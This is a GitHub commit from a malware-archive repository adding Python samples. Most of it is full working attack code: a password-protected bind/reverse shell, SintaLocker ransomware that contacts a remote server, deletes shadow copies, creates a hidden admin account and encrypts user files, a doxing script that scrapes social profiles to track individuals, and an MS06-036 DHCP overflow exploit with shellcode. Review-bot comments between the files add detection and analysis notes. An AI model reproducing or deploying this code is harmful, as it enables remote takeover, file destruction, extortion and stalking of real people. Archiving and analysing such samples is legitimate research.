Add files via upload

vxunderground 2020-10-09 22:09:52 -05:00 committed by GitHub
parent f5ec68af9b
commit 9cbdb38457
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
17 changed files with 2998 additions and 0 deletions

BIN
Python/AngstStealer.7z Normal file

Binary file not shown.

BIN
Python/Aris.7z Normal file

Binary file not shown.


@ -0,0 +1,121 @@
#!/usr/bin/env python
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
# #
# alpha #
# #
# #
# usage: #
# % ./d00r -b password port #
# % ./d00r -r password port host #
# % nc host port #
# % nc -l -p port (please use netcat) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import os, sys, socket, time
# =================== var =======
MAX_LEN=1024
SHELL="/bin/zsh -c"
TIME_OUT=300 #s
PW=""
PORT=""
HOST=""
# =================== funct =====
# shell - exec command, return stdout, stderr; improvable
def shell(cmd):
sh_out=os.popen(SHELL+" "+cmd).readlines()
nsh_out=""
for i in range(len(sh_out)):
nsh_out+=sh_out[i]
return nsh_out
# action?
def action(conn):
conn.send("\nPass?\n")
try: pw_in=conn.recv(len(PW))
except: print "timeout"
else:
if pw_in == PW:
conn.send("j00 are on air!\n")
while True:
conn.send(">>> ")
try:
pcmd=conn.recv(MAX_LEN)
except:
print "timeout"
return True
else:
#print "pcmd:",pcmd
cmd=""#pcmd
for i in range(len(pcmd)-1):
cmd+=pcmd[i]
if cmd==":dc":
return True
elif cmd==":sd":
return False
else:
if len(cmd)>0:
out=shell(cmd)
conn.send(out)
# =================== main ======
argv=sys.argv
if len(argv)<4:
print "error; help: head -n 16 d00r.py"
sys.exit(1)
elif argv[1]=="-b":
PW=argv[2]
PORT=argv[3]
elif argv[1]=="-r" and len(argv)>4:
PW=argv[2]
PORT=argv[3]
HOST=argv[4]
else: exit(1)
PORT=int(PORT)
print "PW:",PW,"PORT:",PORT,"HOST:",HOST
#sys.argv[0]="d00r"
# exit father proc
if os.fork()!=0:
sys.exit(0)
# associate the socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
if argv[1]=="-b":
sock.bind(('localhost', PORT))
sock.listen(0)
run=True
while run:
if argv[1]=="-r":
try: sock.connect( (HOST, PORT) )
except:
print "host unreachable"
time.sleep(5)
else: run=action(sock)
else:
try: (conn,addr)=sock.accept()
except:
print "timeout"
time.sleep(1)
else: run=action(conn)
# shutdown the sokcet
if argv[1]=="-b": conn.shutdown(2)
else:
try: sock.send("")
except: time.sleep(1)
else: sock.shutdown(2)
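Review bot: The header banner (the `# usage:` block at the top of this file) documents invocation only and nowhere marks the file as a backdoor specimen; I would add beneath it `# SAMPLE: password-gated bind/reverse shell kept for analysis; run only in an isolated lab`. For detection notes, the visible behaviour is that the parent exits after `os.fork()`, each received line is handed to `/bin/zsh -c` through `os.popen`, and the whole session is cleartext with the fixed prompts `Pass?`, `j00 are on air!` and `>>> `, which make workable network signatures. The code uses Python 2 `print` statements and sends `str` objects over the socket, so triage should assume a Python 2 interpreter on any host where it ran. The file's path is not shown in this section of the page.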

463
Python/CryPy_Source.py Normal file

@ -0,0 +1,463 @@
import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2
import SintaRegistery
import SintaChangeWallpaper
from Crypto import Random
from Crypto.Cipher import AES
rmsbrand = 'SintaLocker'
newextns = 'sinta'
encfolder = '__SINTA I LOVE YOU__'
email_con = 'sinpayy@yandex.com'
btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1'
userhome = os.path.expanduser('~')
my_server = 'http://www.dobrebaseny.pl/js/lib/srv/'
wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg'
victim_info = base64.b64encode(str(platform.uname()))
configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname()))
glob_config = None
try:
glob_config = json.loads(urllib.urlopen(configurl).read())
if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']):
raise Exception('0x00001')
except IOError:
time.sleep(1)
victim_id = glob_config[u'MRU_ID']
victim_r = glob_config[u'MRU_UDP']
victim_s = glob_config[u'MRU_PDP']
try:
os.system('bcdedit /set {default} recoveryenabled No')
os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f')
except WindowsError:
pass
def setWallpaper(imageUrl):
try:
wallpaper = SintaChangeWallpaper.ChangeWallpaper()
wallpaper.downloadWallpaper(imageUrl)
except:
pass
def persistance():
try:
SintaRegistery.addRegistery(os.path.realpath(__file__))
except:
pass
def destroy_shadow_copy():
try:
os.system('vssadmin Delete Shadows /All /Quiet')
except:
pass
def create_remote_desktop():
try:
os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f')
os.system('net user ' + victim_r + ' ' + victim_s + ' /add')
os.system('net localgroup administrators ' + victim_r + ' /add')
except:
pass
def write_instruction(dir, ext):
try:
files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w')
files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '')
except:
pass
def delete_file(filename):
try:
os.remove(filename)
except:
pass
def find_files(root_dir):
write_instruction(root_dir, 'md')
extentions = ['*.txt',
'*.exe',
'*.php',
'*.pl',
'*.7z',
'*.rar',
'*.m4a',
'*.wma',
'*.avi',
'*.wmv',
'*.csv',
'*.d3dbsp',
'*.sc2save',
'*.sie',
'*.sum',
'*.ibank',
'*.t13',
'*.t12',
'*.qdf',
'*.gdb',
'*.tax',
'*.pkpass',
'*.bc6',
'*.bc7',
'*.bkp',
'*.qic',
'*.bkf',
'*.sidn',
'*.sidd',
'*.mddata',
'*.itl',
'*.itdb',
'*.icxs',
'*.hvpl',
'*.hplg',
'*.hkdb',
'*.mdbackup',
'*.syncdb',
'*.gho',
'*.cas',
'*.svg',
'*.map',
'*.wmo',
'*.itm',
'*.sb',
'*.fos',
'*.mcgame',
'*.vdf',
'*.ztmp',
'*.sis',
'*.sid',
'*.ncf',
'*.menu',
'*.layout',
'*.dmp',
'*.blob',
'*.esm',
'*.001',
'*.vtf',
'*.dazip',
'*.fpk',
'*.mlx',
'*.kf',
'*.iwd',
'*.vpk',
'*.tor',
'*.psk',
'*.rim',
'*.w3x',
'*.fsh',
'*.ntl',
'*.arch00',
'*.lvl',
'*.snx',
'*.cfr',
'*.ff',
'*.vpp_pc',
'*.lrf',
'*.m2',
'*.mcmeta',
'*.vfs0',
'*.mpqge',
'*.kdb',
'*.db0',
'*.mp3',
'*.upx',
'*.rofl',
'*.hkx',
'*.bar',
'*.upk',
'*.das',
'*.iwi',
'*.litemod',
'*.asset',
'*.forge',
'*.ltx',
'*.bsa',
'*.apk',
'*.re4',
'*.sav',
'*.lbf',
'*.slm',
'*.bik',
'*.epk',
'*.rgss3a',
'*.pak',
'*.big',
'*.unity3d',
'*.wotreplay',
'*.xxx',
'*.desc',
'*.py',
'*.m3u',
'*.flv',
'*.js',
'*.css',
'*.rb',
'*.png',
'*.jpeg',
'*.p7c',
'*.p7b',
'*.p12',
'*.pfx',
'*.pem',
'*.crt',
'*.cer',
'*.der',
'*.x3f',
'*.srw',
'*.pef',
'*.ptx',
'*.r3d',
'*.rw2',
'*.rwl',
'*.raw',
'*.raf',
'*.orf',
'*.nrw',
'*.mrwref',
'*.mef',
'*.erf',
'*.kdc',
'*.dcr',
'*.cr2',
'*.crw',
'*.bay',
'*.sr2',
'*.srf',
'*.arw',
'*.3fr',
'*.dng',
'*.jpeg',
'*.jpg',
'*.cdr',
'*.indd',
'*.ai',
'*.eps',
'*.pdf',
'*.pdd',
'*.psd',
'*.dbfv',
'*.mdf',
'*.wb2',
'*.rtf',
'*.wpd',
'*.dxg',
'*.xf',
'*.dwg',
'*.pst',
'*.accdb',
'*.mdb',
'*.pptm',
'*.pptx',
'*.ppt',
'*.xlk',
'*.xlsb',
'*.xlsm',
'*.xlsx',
'*.xls',
'*.wps',
'*.docm',
'*.docx',
'*.doc',
'*.odb',
'*.odc',
'*.odm',
'*.odp',
'*.ods',
'*.odt',
'*.sql',
'*.zip',
'*.tar',
'*.tar.gz',
'*.tgz',
'*.biz',
'*.ocx',
'*.html',
'*.htm',
'*.3gp',
'*.srt',
'*.cpp',
'*.mid',
'*.mkv',
'*.mov',
'*.asf',
'*.mpeg',
'*.vob',
'*.mpg',
'*.fla',
'*.swf',
'*.wav',
'*.qcow2',
'*.vdi',
'*.vmdk',
'*.vmx',
'*.gpg',
'*.aes',
'*.ARC',
'*.PAQ',
'*.tar.bz2',
'*.tbk',
'*.bak',
'*.djv',
'*.djvu',
'*.bmp',
'*.cgm',
'*.tif',
'*.tiff',
'*.NEF',
'*.cmd',
'*.class',
'*.jar',
'*.java',
'*.asp',
'*.brd',
'*.sch',
'*.dch',
'*.dip',
'*.vbs',
'*.asm',
'*.pas',
'*.ldf',
'*.ibd',
'*.MYI',
'*.MYD',
'*.frm',
'*.dbf',
'*.SQLITEDB',
'*.SQLITE3',
'*.asc',
'*.lay6',
'*.lay',
'*.ms11 (Security copy)',
'*.sldm',
'*.sldx',
'*.ppsm',
'*.ppsx',
'*.ppam',
'*.docb',
'*.mml',
'*.sxm',
'*.otg',
'*.slk',
'*.xlw',
'*.xlt',
'*.xlm',
'*.xlc',
'*.dif',
'*.stc',
'*.sxc',
'*.ots',
'*.ods',
'*.hwp',
'*.dotm',
'*.dotx',
'*.docm',
'*.DOT',
'*.max',
'*.xml',
'*.uot',
'*.stw',
'*.sxw',
'*.ott',
'*.csr',
'*.key',
'wallet.dat']
for dirpath, dirs, files in os.walk(root_dir):
if 'Windows' not in dirpath:
for basename in files:
for ext in extentions:
if fnmatch.fnmatch(basename, ext):
filename = os.path.join(dirpath, basename)
yield filename
def make_directory(file_path):
directory = file_path + '' + encfolder
if not os.path.exists(directory):
try:
os.makedirs(directory)
except:
pass
def text_generator(size = 6, chars = string.ascii_uppercase + string.digits):
return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns
def generate_file(file_path, filename):
make_directory(file_path)
key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ])
newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm')
try:
encrypt_file(key, filename, newfilename)
except:
pass
def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16):
if not out_filename:
out_filename = newfilename
iv = ''.join((chr(random.randint(0, 255)) for i in range(16)))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
listdir = (userhome + '\\Contacts\\',
userhome + '\\Documents\\',
userhome + '\\Downloads\\',
userhome + '\\Favorites\\',
userhome + '\\Links\\',
userhome + '\\My Documents\\',
userhome + '\\My Music\\',
userhome + '\\My Pictures\\',
userhome + '\\My Videos\\',
'D:\\',
'E:\\',
'F:\\',
'G:\\',
'I:\\',
'J:\\',
'K:\\',
'L:\\',
'M:\\',
'N:\\',
'O:\\',
'P:\\',
'Q:\\',
'R:\\',
'S:\\',
'T:\\',
'U:\\',
'V:\\',
'W:\\',
'X:\\',
'Y:\\',
'Z:\\')
for dir_ in listdir:
for filename in find_files(dir_):
generate_file(dir_, filename)
delete_file(filename)
persistance()
destroy_shadow_copy()
create_remote_desktop()
write_instruction(userhome + '\\Desktop\\', 'txt')
os.startfile(userhome + '\\Desktop\\README_FOR_DECRYPT.txt')
setWallpaper(wallpaper_link)
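Review bot: `generate_file` builds a fresh 32-character key per file with `random.choice` and passes it only to `encrypt_file`; nothing in this file stores or transmits that key, so as far as this section shows the ransom note's promise of a decryption program is not backed by recoverable key material, and that deserves a comment above `generate_file`, e.g. `# ANALYSIS: per-file key is discarded after use; recovery depends on backups, not payment`. A top-of-file comment for responders should also record that the sample requests its config from the `my_server` URL before anything else and indexes `glob_config` immediately afterwards, so it appears to abort when that request fails. Host-side indicators visible here are the `bcdedit` and `vssadmin Delete Shadows` calls, the `DisableTaskMgr`/`DisableRegistryTools`/`DisableCMD`/`NoRun` policy values, the `fDenyTSConnections` change with `net user ... /add`, and the `README_FOR_DECRYPT` files.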

336
Python/Doxing-Script-Py3.py Normal file

@ -0,0 +1,336 @@
import os
import requests
import sys
import subprocess
import re
import face_recognition
import json
done_checks = []
social_media = []
usernames = []
emails = []
twitter = []
instagram = []
steam = []
urls = []
urls_stalk = []
urls_done = []
name = ""
adresse = ""
compare = False
first_dl = False
def stalk(user):
if len(user) > 1:
global urls_stalk
pastebin_url = "https://pastebin.com/u/" + user
pastebin_str = "s Pastebin - Pastebin.com"
patreon_url = "https://www.patreon.com/" + user
patreon_str = 'created_at'
gutefrage_url = "https://www.gutefrage.net/nutzer/" + user
gutefrage_str = '<meta name="title" content="Profil von'
ebay_url = "https://www.ebay.de/usr/" + user
ebay_str = '<span>Angemeldet seit: </span>'
twitter_url = "https://twitter.com/" + user
twitter_str = '<link rel="canonical" href="https://twitter.com/' + user + '">'
facebook_url = 'https://facebook.com/' + user
facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user
instagram_url = "https://www.instagram.com/" + user + "/"
instagram_str = '<link rel="alternate" href="https://www.instagram.com/' + user + '/?hl=en" hreflang="en" />'
steam_url = "https://steamcommunity.com/id/" + user
steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif'
twitch_url = "https://www.twitch.tv/" + user
twitch_str = "content='twitch://stream/" + user
lachschon_url = "https://www.lachschon.de/community/user/" + user + "/"
lachschon_str = '<label>Rang</label>'
URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url]
STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str]
for i in range(0, len(URLS)):
html = getResponse(URLS[i])
if STRS[i].lower() in str(html).lower():
print("\t> " + URLS[i])
urls_stalk.append(URLS[i])
def get_twitter_img(user):
url = "https://twitter.com/" + user
html = subprocess.getoutput("phantomjs html.js " + url)
image = find_between(html, '<img class="ProfileAvatar-image " src="', '" alt="')
r = requests.get(image)
with open('Twitter.jpg', 'wb') as f:
f.write(r.content)
def get_instagram_img(user):
data = {
'username': user,
'submit': 'View DP'
}
response = requests.post('https://fullinstadp.com/index.php', data=data)
html = response.text
f = open("Out.html", "w")
f.write(html)
f.close
img_url = find_between(html, '<img class="loading img-rounded center-block img-responsive" src="', '" alt=""')
r = requests.get(img_url)
with open('Instagram.jpg', 'wb') as f:
f.write(r.content)
def check_mail(string):
EMAIL_REGEX = re.compile(r"[^@]+@[^@]+\.[^@]+")
if EMAIL_REGEX.match(string):
return True
else:
return False
def check_string_mail(string):
global emails
splitted = string.split(" ")
for word in splitted:
if check_mail(word):
emails.append(word)
def check_string_url(string):
global urls
for word in string.split(" "):
try:
url = re.search("(?P<url>https?://[^\s]+)", word).group("url")
if '//t.co/' in url:
last = url[-1:]
if last == ".":
url = url.rstrip('.')
r = requests.get(url)
url = r.url
urls.append(url)
except:
e = ""
def check_string_socialmedia(string):
global social_media
count = 0
next = 0
for word in string.split(" "):
next = count + 2
if 'facebook' in word.lower():
print(string.split(" ")[next])
count +=1
def youtube(url):
url = url + "/about"
html = subprocess.getoutput("phantomjs html.js " + url)
tmp_str = html.split('"}},"urlEndpoint":')
for url in tmp_str:
#print(url)
url = find_between(url, '{"url":"', '","target":')
print(html)
def grab_instagram(profile):
global done_checks
global urls
global instagram
global usernames
global compare
if not "instagram: " + profile in done_checks:
if not profile in usernames:
usernames.append(profile)
url = "https://www.instagram.com/" + profile + "/"
html = subprocess.getoutput("phantomjs html.js " + url)
if '"@type":"Person","name":"' in html:
display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"')
if not display_name in usernames:
usernames.append(display_name)
if not "instagram: " + display_name in done_checks:
print(display_name)
stalk(display_name)
instagram.append("Display Name: " + display_name)
description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer')
follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer')
check_string_mail(description)
check_string_url(description)
instagram.append("Description: " + description)
instagram.append("Follower: " + follower)
#get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion
compare = True
if not "instagram: " + profile in done_checks:
done_checks.append("instagram: " + profile)
def grab_steam(url):
global done_checks
global urls
global usernames
if not "steam: " + profile in done_checks:
url = url + "/ajaxaliases/"
response = requests.get(url)
html = response.text
for item in html.split("newname"):
username = find_between(item, '":"', '","timechanged')
if not username in usernames:
usernames.append(username)
def grab_twitter(profile):
global done_checks
global urls
global adresse
global usernames
global twitter
global first_dl
if not "twitter: " + profile in done_checks:
url = "https://twitter.com/" + profile
urls.append(url)
html = subprocess.getoutput("phantomjs html.js " + url)
#variables
display_name = find_between(html, '<title>', ' (@')
if not profile in usernames:
usernames.append(profile)
if not display_name in usernames:
usernames.append(display_name)
if not "twitter: " + display_name in done_checks:
print(display_name)
stalk(display_name)
join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten')
description = ""
url = ""
location = ""
#if
if '<meta name="description"' in html:
description = find_between(html, '<meta name="description" content="', '">')
description = description.replace("&quot", "")
check_string_mail(description)
check_string_url(description)
if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html:
tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>')
url = find_between(tmp, '" title="', '">')
urls.append(url)
if 'location&quot;:&quot;' in html:
location = find_between(html, '&quot;location&quot;:&quot;', '&quot;,&quot;url')
if len(location) > 0:
adresse = location
twitter.append("Display Name: " + display_name)
twitter.append("Join Date: " + join_date)
twitter.append("Description: " + description)
twitter.append("URL: " + url)
twitter.append("Location: " + location)
twitter.append(" ")
#if first_dl == False:
#get_twitter_img(profile)
#first_dl = True
if not "twitter: " + profile in done_checks:
done_checks.append("twitter: " + profile)
def handle():
try:
if sys.argv[1]:
social_media = sys.argv[1].lower()
if sys.argv[2]:
info_type = sys.argv[2].lower()
if sys.argv[3]:
infos = sys.argv[3].lower()
if info_type == "url":
if social_media == "youtube":
youtube(infos)
elif info_type == "profile":
if social_media == "twitter":
grab_twitter(infos)
elif info_type == "user":
if social_media == "stalk":
stalk(infos)
except Exception as e:
print(e)
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def getResponse(url):
response = requests.get(url)
#response.raise_for_status()
data = response.content
return data
handle()
for url in urls_stalk:
#print(url)
if 'twitter.com' in url:
checked = False
profile = url.split("/")[3]
for check in done_checks:
if check == "twitter: " + profile:
checked = True
if not checked:
grab_twitter(profile)
done_checks.append("twitter:" + profile)
if 'instagram.com' in url:
checked = False
profile = url.split("/")[3]
for check in done_checks:
if check == "instagram: " + profile:
checked = True
if not checked:
grab_instagram(profile)
#print("Download Profile Picture")
done_checks.append("instagram: " + profile)
#Steam Check direkt in der Stalk Funktion
if 'steamcommunity.com' in url:
checked = False
profile = url.split("/")[4]
for check in done_checks:
if check == "steam: " + profile:
checked = True
if not checked:
grab_steam(url)
done_checks.append("steam: " + profile)
print("------------------")
print("Usernames:")
print("------------------")
for user in usernames:
print(user)
stalk(user)
if len(urls) > 0:
print("------------------")
print("URLs:")
print("------------------")
for url in urls:
print(url)
if len(twitter) > 0:
print("------------------")
print("Twitter:")
print("------------------")
for item in twitter:
print(item)
if len(instagram) > 0:
print("------------------")
print("Instagram:")
print("------------------")
for item in instagram:
print(item)
if len(steam) > 0:
print("------------------")
print("Steam:")
print("------------------")
for item in steam:
print(item)
print("------------------")
print("Sites checked:")
print("------------------")
for check in done_checks:
print(check)
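Review bot: `get_twitter_img`, `youtube`, `grab_instagram` and `grab_twitter` all build a shell command with `subprocess.getoutput("phantomjs html.js " + url)`, and the concatenated value can originate from scraped page text (display names are passed to `stalk`, land in `urls_stalk`, and are split back out as `profile`), so remote content can reach a shell on the machine running the script. Anyone executing this sample for analysis should treat that as a hazard; I would mark each call with `# NOTE: scraped/remote text reaches a shell command line here; sandbox only`. Separately, `grab_steam(url)` reads `profile`, which is not one of its parameters and resolves only through the module-level loop variable, and `f.close` in `get_instagram_img` is missing its call parentheses, so that handle is never explicitly closed.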


@ -0,0 +1,237 @@
#!/usr/bin/env python
#
#
# by redsand@blacksecurity.org
# this (like any thing) would not be possible w/out the bl4ck team.
# thanks guys.
#
import sys, os
sys.path.append("pydhcplib")
from scapy import *
from pydhcplib.dhcp_packet import *
from pydhcplib.dhcp_network import *
from pydhcplib.type_strlist import *
from pydhcplib.type_ipv4 import *
from pydhcplib.type_hw_addr import *
inet_face = "vmnet8"
default_ip = "10.31.33.7"
# user bl4ck/bl4ck
# this exits via Thread (so thta we kill the dhcp thread in services.exe
#
# this means if services doesn't crash, it was a successful exploit
#
scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \
"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \
"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \
"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \
"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \
"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \
"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \
"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \
"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \
"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \
"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \
"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \
"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \
"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \
"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5"
netopt = {'client_listen_port':"68",
'server_listen_port':"67",
'listen_address':"0.0.0.0"}
def substr(i,o,off):
begin=i[:off]
end=i[off+len(o):]
ret=begin+o+end
return ret
def io(i):
str=""
a=chr(i % 256)
i=i >> 8
b=chr(i % 256)
i=i >> 8
c=chr(i % 256)
i=i >> 8
d=chr(i % 256)
str+="%c%c%c%c" % (a,b,c,d)
return str
class Server(DhcpServer):
def __init__(self, options):
DhcpServer.__init__(self,options["listen_address"],
options["client_listen_port"],
options["server_listen_port"])
def HandleDhcpDiscover(self, packet):
my_reqip = ''
my_reqip = default_ip
sid_i = my_reqip.rfind(".")
server_ip = my_reqip[0:sid_i] + ".254"
our_ip = my_reqip[0:sid_i] + ".2"
mymac = hwmac(packet.GetHardwareAddress()).str()
print "** Received discover from %s (%s)" % (mymac,my_reqip)
mpacket = DhcpPacket()
mpacket.CreateDhcpOfferPacketFrom(packet)
mpacket.SetOption("dhcp_message_type",[2])
mpacket.SetOption("yiaddr", ipv4(my_reqip).list())
mpacket.SetOption("siaddr", ipv4(server_ip).list())
mpacket.SetOption("ip_address_lease_time",[0,0,7,8])
mpacket.SetOption("flags",[0,0])
mpacket.SetOption("server_identifier", ipv4(server_ip).list())
mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list())
mpacket.SetOption("domain_name_server", ipv4(our_ip).list())
mpacket.SetOption("router",ipv4(our_ip).list())
mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list())
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
append = "\xfa\xff" + ( "\x90" * 0xff )
p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('')
print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip)
sendp(p, iface=inet_face, verbose=False)
def HandleDhcpRequest(self, packet):
ip = packet.GetOption("request_ip_address")
sid = packet.GetOption("server_identifier")
ciaddr = packet.GetOption("ciaddr")
my_reqip = ''
try:
data = packet.options_data['request_ip_address']
for i in range(0,len(data),4) :
if len(data[i:i+4]) == 4 :
my_reqip += ipv4(data[i:i+4]).str()
except:
my_reqip = default_ip
mymac = hwmac(packet.GetHardwareAddress()).str()
print "** Received request from %s (%s)" % (my_reqip,mymac)
sid_i = my_reqip.rfind(".")
server_ip = my_reqip[0:sid_i] + ".254"
our_ip = my_reqip[0:sid_i] + ".2"
mypacket = DhcpPacket()
mypacket.CreateDhcpAckPacketFrom(packet)
mypacket.SetOption("yiaddr", ipv4(my_reqip).list())
dumbstr = "\x90" * 0xFF
# we're looking for a jmp/call ebx ?! or landing in our codespace
# directly
# C5 converts to 253C
# BB = 2557
# AA = 00AC
# DD = 258C
# EE = 03B5
# 88 = 00D6
# 99 = 00EA
# F3 = 2591
# B0 = 2264
# 8F = 00c5
eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64"
#eipstr = "C" * 0xFF
payload = "\x42" * 0xFF
payload = substr(payload, scode, 1)
## find location in heap to ret2
# find offset & append as many "\x26\x6e\x43\x6e"
# to increment ebx to a non trashed location (since ebx points to our code)
# then push ebx \x53 and \xc4 (retn)
#
# we're looking for a pop+pop+ret or a jmp/call ebx to return to our
# unicode filtered input
# note it must be iwthin the bounds of 0x0000**** - 0x0070****
# or 0x22***** <-- wont help us
append = "\x0f\xff" + ( "\x90" * 0xff )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( eipstr )
append += "\xfa\xff" + ( eipstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( dumbstr )
append += "\xfa\xff" + ( payload[0:254]) + "\x00"
print "Length of our attack: %r" % len(append)
eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face))
p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024)
print "** Sending DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip)
for i in p:
sendp(eth/i, iface=inet_face, verbose=False)
def HandleDhcpDecline(self, packet):
return
#print "** Dhcp Declined"
#packet.PrintHeaders()
#packet.PrintOptions()
def HandleDhcpRelease(self, packet):
return
#packet.PrintHeaders()
#packet.PrintOptions()
def HandleDhcpInform(self, packet):
return
#packet.PrintHeaders()
#packet.PrintOptions()
print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow"
print "\t by redsand@blacksecurity.org"
print "Usage: %s [interface] [forced request ip]" % sys.argv[0]
print ""
if len(sys.argv) > 1:
inet_face = sys.argv[1]
if len(sys.argv) > 2:
default_ip = sys.argv[2]
print "Listening for client requests:\n"
print "Listening on interface: %s" % inet_face
print "Using default address: %s" % default_ip
server = Server(netopt)
while True :
server.GetNextDhcpPacket()
